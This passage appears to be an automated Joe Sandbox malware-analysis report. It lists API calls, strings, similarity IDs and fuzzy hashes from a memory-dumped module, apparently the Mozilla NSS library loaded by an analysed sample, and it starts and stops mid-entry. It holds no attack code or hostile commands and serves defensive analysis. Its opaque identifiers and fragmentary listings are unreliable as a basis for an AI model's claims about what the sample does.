  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
  • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
  • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
  • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
  • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
• TlsGetValue.KERNEL32 ref: 6C48DCFA
• EnterCriticalSection.KERNEL32(00000000), ref: 6C48DD0E
• PK11_IsFriendly.NSS3(?), ref: 6C48DD73
• PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C48DD8B
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48DE81
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48DEA6
• PR_Unlock.NSS3(?), ref: 6C48DF08
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
• String ID:
• API String ID: 519503562-0
APIs
• sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460AB
• sqlite3_config.NSS3(00000004,6C594CA4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460EB
• sqlite3_config.NSS3(00000012,6C594CC4,?,?,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C446122
Strings
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C446095
• %s at line %d of [%.10s], xrefs: 6C4460A4
• misuse, xrefs: 6C44609F
Similarity
• API ID: sqlite3_config$sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
• API String ID: 1634735548-648709467
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
• sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3F51BB
Strings
• unable to delete/modify user-function due to active statements, xrefs: 6C3F51DF
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3F51A5
• %s at line %d of [%.10s], xrefs: 6C3F51B4
• misuse, xrefs: 6C3F51AF
Similarity
• API ID: sqlite3_logstrlen
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
• API String ID: 3619038524-4115156624
APIs
• PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF4B
• PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF6F
• memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF81
• PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF8D
• memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFFA3
• SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C4DF165,6C5A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4DFFC8
• PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4E00A6
Similarity
• API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
• String ID:
• API String ID: 204871323-0
APIs
• TlsGetValue.KERNEL32 ref: 6C49DF37
• EnterCriticalSection.KERNEL32(?), ref: 6C49DF4B
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DF96
• PR_SetError.NSS3(00000000,00000000), ref: 6C49E02B
• PR_Unlock.NSS3(?), ref: 6C49E07E
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C49E090
• PR_Unlock.NSS3(?), ref: 6C49E0AF
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4073542275-0
                                                                                                                                                                                                                          • Opcode ID: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                          • Instruction ID: 429f43923db7f0e27948bcce0a3da69ca4f4eb8277ccffe3ad8dc9af2c8af21a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3651BD35A00620CFEB20DE24DC85F667BB5BB44319F204528E85A47F91E732E849CBD2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC35
                                                                                                                                                                                                                            • Part of subcall function 6C49CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C49CF16
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC55
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E,?,?), ref: 6C4BAC70
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E33C
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E350
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PR_Unlock.NSS3(?), ref: 6C49E5BC
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C49E5CA
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E5F2
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E606
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PORT_Alloc_Util.NSS3(?), ref: 6C49E613
                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C4BAC92
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E), ref: 6C4BACD7
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4BAD10
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C4BAD2B
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: TlsGetValue.KERNEL32(00000000,?,6C4BA904,?), ref: 6C49F38B
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: EnterCriticalSection.KERNEL32(?,?,?,6C4BA904,?), ref: 6C49F3A0
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: PR_Unlock.NSS3(?,?,?,?,6C4BA904,?), ref: 6C49F3D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                                                          • Opcode ID: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                          • Instruction ID: e5c3672a96360c1ee85c41b8b9d198667f4bc5e18be6a721e9f53991e0af4443
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 893126B1E006155FEB00DE698C40DAF7B76AF84328B19812CE819AB740EB31AD0597F1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C498C7C
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C498CB0
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C498CD1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C498CE5
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C498D2E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C498D62
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C498D93
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                                                          • Opcode ID: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                          • Instruction ID: cba4450bdd4d825cd769908b14c79650ad8be9e97cf332eeb2196fff2715c3c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE313771A01221ABE700DF68DC44FAABB70BF55318F24023AEA1967B60D771B954C7C1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D13F0
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,?,?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C4D1445
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4D9C5B), ref: 6C4D9DDC
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C4D9C5B), ref: 6C4D9DFE
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
• PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C4D9C5B), ref: 6C4D9E91
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
  • Part of subcall function 6C4D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C4CFAAB,00000000), ref: 6C4D157E
  • Part of subcall function 6C4D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C4CFAAB,00000000), ref: 6C4D1592
  • Part of subcall function 6C4D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C4D1600
  • Part of subcall function 6C4D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C4D1620
  • Part of subcall function 6C4D1560: PR_Unlock.NSS3(?), ref: 6C4D1639
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
• String ID:
• API String ID: 3425318038-0
• Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
• Instruction ID: 4249a386122c0e3bff33582ebc2076fae071e19c48697e2a3ba946ac015d321d
• Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
• Instruction Fuzzy Hash: 90416DB4501606AFE740EF55D860F92BBA1BF55359F158128D8188BFA1EB73F834CB90
APIs
• SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C49DDEC
  • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
• PK11_DigestBegin.NSS3(00000000), ref: 6C49DE70
• PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C49DE83
• HASH_ResultLenByOidTag.NSS3(?), ref: 6C49DE95
• PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C49DEAE
• PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49DEBB
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DECC
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
• String ID:
• API String ID: 1091488953-0
• Opcode ID: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
• Instruction ID: d30511af52402c2ea8b1f9a1e1ab657b394bc275dab328c84ce2a1ced914b554
• Opcode Fuzzy Hash: ab696be14843d5d0651000a603ceec293127735ca39ed1935b20ebe4536ae647
• Instruction Fuzzy Hash: 8D31B7B29006246BEF00EF69AD41FBB7BA89F54609F050139ED09A7751FB31D91486E2
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C477E48
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C477E5B
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477E7B
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59925C,?), ref: 6C477E92
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477EA1
• SECOID_FindOID_Util.NSS3(00000004), ref: 6C477ED1
• SECOID_FindOID_Util.NSS3(00000004), ref: 6C477EFA
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
• String ID:
• API String ID: 3989529743-0
• Opcode ID: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
• Instruction ID: 677cfb5c98120e0505d8e5d4d079466cc86887269ab1090d0703ff0481d9a10a
• Opcode Fuzzy Hash: 315a16e323f488ecc4cb802a9f281815cf290a94d08a32cace915d36feea165d
• Instruction Fuzzy Hash: C4318FB2E052119BEB21DA659D40FAB77A8EF44259F564828DD19EBB01E720FC04C7F1
APIs
• memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC30
• PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC4E
• PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C4CD9E4,00000000), ref: 6C4CDC5A
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4CDC7E
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CDCAD
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Alloc_Util$Arenamemcpy
• String ID:
• API String ID: 2632744278-0
• Opcode ID: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
• Instruction ID: 4ada438c8fb228685ece9323e89370b2de5b82c67103bebddc217d7e74ba9a64
• Opcode Fuzzy Hash: 4b9a72d80384a1e0d8ad25befe4b53753f44dcd72e8b0877b3ad2aa5ed507521
• Instruction Fuzzy Hash: AD318DB9A402009FE710DF59DC84E96B7F8AF04358F148029E949CBB10E7B1E944CBA2
APIs
• TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C48E728,?,00000038,?,?,00000000), ref: 6C492E52
• EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E66
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C492E7B
• EnterCriticalSection.KERNEL32(00000000), ref: 6C492E8F
• PL_HashTableLookup.NSS3(?,?), ref: 6C492E9E
• PR_Unlock.NSS3(?), ref: 6C492EAB
• PR_Unlock.NSS3(?), ref: 6C492F0D
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                                                          • Opcode ID: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                          • Instruction ID: bc05a042e1911b5117ee8dd2577e6361dbec1dc7ab1f5d16e0594a5ffe435b35
